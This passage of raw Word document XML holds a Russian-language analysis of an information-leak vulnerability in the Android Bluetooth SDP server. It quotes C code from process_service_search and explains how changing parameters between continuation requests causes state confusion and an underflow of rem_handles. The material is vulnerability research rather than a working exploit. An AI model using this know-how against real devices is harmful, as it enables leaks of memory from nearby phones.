        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cont</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E513F3">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>offset</w:t>
      </w:r>
      <w:r w:rsidRPr="00E513F3">
        <w:t xml:space="preserve">, утечка информации по-прежнему достижима. В следующем выдержке </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>num</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E513F3">
        <w:t>_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rsp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E513F3">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>handles</w:t>
      </w:r>
      <w:r w:rsidRPr="00E513F3">
        <w:t xml:space="preserve"> будет удерживать общее количество дескрипторов (то есть записей </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sdp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E513F3">
        <w:t xml:space="preserve">) ответа </w:t>
      </w:r>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SDP</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880000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="RobotoMono-Regular"/>
          <w:color w:val="880000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>/* Check if this is a continuation request */</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000088"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">if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p_req</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000088"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">if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cont_offset</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p_ccb</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-&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="RobotoMono-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>cont_offset</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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="RobotoMono-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>sdpu_build_n_send_error</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p_ccb</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trans_num</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00"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>SDP_INVALID_CONT_STATE,</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666600"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="RobotoMono-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">SDP_TEXT_BAD_CONT_INX </w:t>
      </w:r>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="RobotoMono-Regular"/>
          <w:color w:val="6666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88"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="RobotoMono-Regular"/>
          <w:color w:val="000088"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>return;</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000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00685E0E" w:rsidRPr="007B67FD"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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="RobotoMono-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>rem_handles</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="RobotoMono-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> =</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="RobotoMono-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>num_rsp_handles</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cont_offset</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880000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>/* extract the remaining handles */</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880000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="RobotoMono-Regular"/>
          <w:color w:val="880000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>/* Calculate how many handles will fit in one PDU */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00685E0E" w:rsidRPr="007B67FD"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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="RobotoMono-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>cur_handles</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660066"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">uint16_t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p_ccb</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-&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="RobotoMono-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>rem_mtu_size</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00"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">SDP_MAX_SERVICE_RSPHDR_LEN </w:t>
      </w:r>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="RobotoMono-Regular"/>
          <w:color w:val="666600"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">) / </w:t>
      </w:r>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="RobotoMono-Regular"/>
          <w:color w:val="006666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">4 </w:t>
      </w:r>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="RobotoMono-Regular"/>
          <w:color w:val="6666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000088"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">if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rem_handles</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&lt;= </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="RobotoMono-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>cur_handles</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="RobotoMono-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>cur_handles</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rem_handles</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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880000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="RobotoMono-Regular"/>
          <w:color w:val="000088"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">else </w:t>
      </w:r>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="RobotoMono-Regular"/>
          <w:color w:val="880000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>/* Continuation is set */</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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="RobotoMono-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>p_ccb</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-&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="RobotoMono-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>cont_offset</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cur_handles</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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88"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="RobotoMono-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>is_cont</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88"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>true;</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000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="RobotoMono-Regular"/>
          <w:color w:val="0000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666600"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="RobotoMono-Regular"/>
          <w:color w:val="6666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666600"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="RobotoMono-Regular"/>
          <w:color w:val="000088"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">for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00"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">xx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cont_offset</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00"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">xx </w:t>
      </w:r>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="RobotoMono-Regular"/>
          <w:color w:val="666600"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="RobotoMono-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>cont_offset</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cur_handles</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00"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">xx </w:t>
      </w:r>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="RobotoMono-Regular"/>
          <w:color w:val="666600"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>++)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00685E0E" w:rsidRDefault="00685E0E" w:rsidP="00685E0E">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="RobotoMono-Regular"/>
          <w:color w:val="666600"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="RobotoMono-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">UINT32_TO_BE_STREAM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p_rsp</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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="RobotoMono-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>rsp_handles</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="RobotoMono-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="RobotoMono-Regular"/>
          <w:color w:val="666600"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">[ </w:t>
      </w:r>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="RobotoMono-Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">xx </w:t>
      </w:r>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="RobotoMono-Regular"/>
          <w:color w:val="666600"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>]);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00685E0E" w:rsidRPr="00E513F3" w:rsidRDefault="00685E0E" w:rsidP="00685E0E">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="RobotoMono-Regular"/>
          <w:color w:val="666600"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00685E0E" w:rsidRDefault="00685E0E" w:rsidP="007B67FD">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:ind w:firstLine="851"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE21FF">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Взято</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE21FF">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE21FF">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>из</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE21FF">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> SDP Search Request handler - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE21FF">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>process_service_search</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE21FF">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (stack/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE21FF">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>sdp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE21FF">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE21FF">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>sdp_server.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE21FF">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00685E0E" w:rsidRPr="00EE21FF" w:rsidRDefault="00685E0E" w:rsidP="00685E0E">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00685E0E" w:rsidRPr="007B67FD" w:rsidRDefault="00685E0E" w:rsidP="00685E0E">
      <w:r w:rsidRPr="00E513F3">
        <w:t xml:space="preserve">Код содержит копию </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cont</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E513F3">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>offset</w:t>
      </w:r>
      <w:r w:rsidRPr="00E513F3">
        <w:t xml:space="preserve"> в своем объекте соединения (</w:t>
      </w:r>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00E513F3">
        <w:t>_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ccb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E513F3">
        <w:t xml:space="preserve">) и подтверждает, что полученный </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cont</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E513F3">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>offset</w:t>
      </w:r>
      <w:r w:rsidRPr="00E513F3">
        <w:t xml:space="preserve"> равен текущему состоянию соединения. Таким образом, простое злоупотребление </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cont</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E513F3">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>offset</w:t>
      </w:r>
      <w:r w:rsidRPr="00E513F3">
        <w:t xml:space="preserve"> не достижимо (как это сделано в </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BlueZ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E513F3">
        <w:t>). Однако, поскольку каждый запрос продолжения представляет собой, по существу, новый запрос, который имеет только присоединенное к нему состояние продолжения, код может вызва</w:t>
      </w:r>
      <w:r>
        <w:t>ть</w:t>
      </w:r>
      <w:r w:rsidRPr="00E513F3">
        <w:t xml:space="preserve"> путаниц</w:t>
      </w:r>
      <w:r>
        <w:t>у</w:t>
      </w:r>
      <w:r w:rsidRPr="00E513F3">
        <w:t xml:space="preserve"> состояни</w:t>
      </w:r>
      <w:r>
        <w:t>й</w:t>
      </w:r>
      <w:r w:rsidRPr="00E513F3">
        <w:t xml:space="preserve">, изменяя параметры запроса между двумя последовательными запросами. Параметр </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>num</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E513F3">
        <w:t>_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rsp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E513F3">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>handles</w:t>
      </w:r>
      <w:r w:rsidRPr="00E513F3">
        <w:t xml:space="preserve"> вычисляется каждый раз, когда запрос получен, исходя из общего размера конкретного ответа. Размер ответа может варьироваться в зависимости от запрошенного поиска услуги, который выполняется, и в отличие от </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cont</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E513F3">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>offset</w:t>
      </w:r>
      <w:r w:rsidRPr="00E513F3">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>num</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E513F3">
        <w:t>_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rsp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E513F3">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>handles</w:t>
      </w:r>
      <w:r w:rsidRPr="00E513F3">
        <w:t xml:space="preserve"> не сохраняется в объекте соединения и проверяется, чтобы </w:t>
      </w:r>
      <w:r w:rsidRPr="00E513F3">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">оставаться неизменным во время чтения фрагментов ответа. В результате этой путаницы состояния может быть достигнуто </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E513F3">
        <w:t>недополнение</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E513F3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E513F3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rem</w:t>
      </w:r>
      <w:r w:rsidRPr="00E513F3">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="00E513F3">
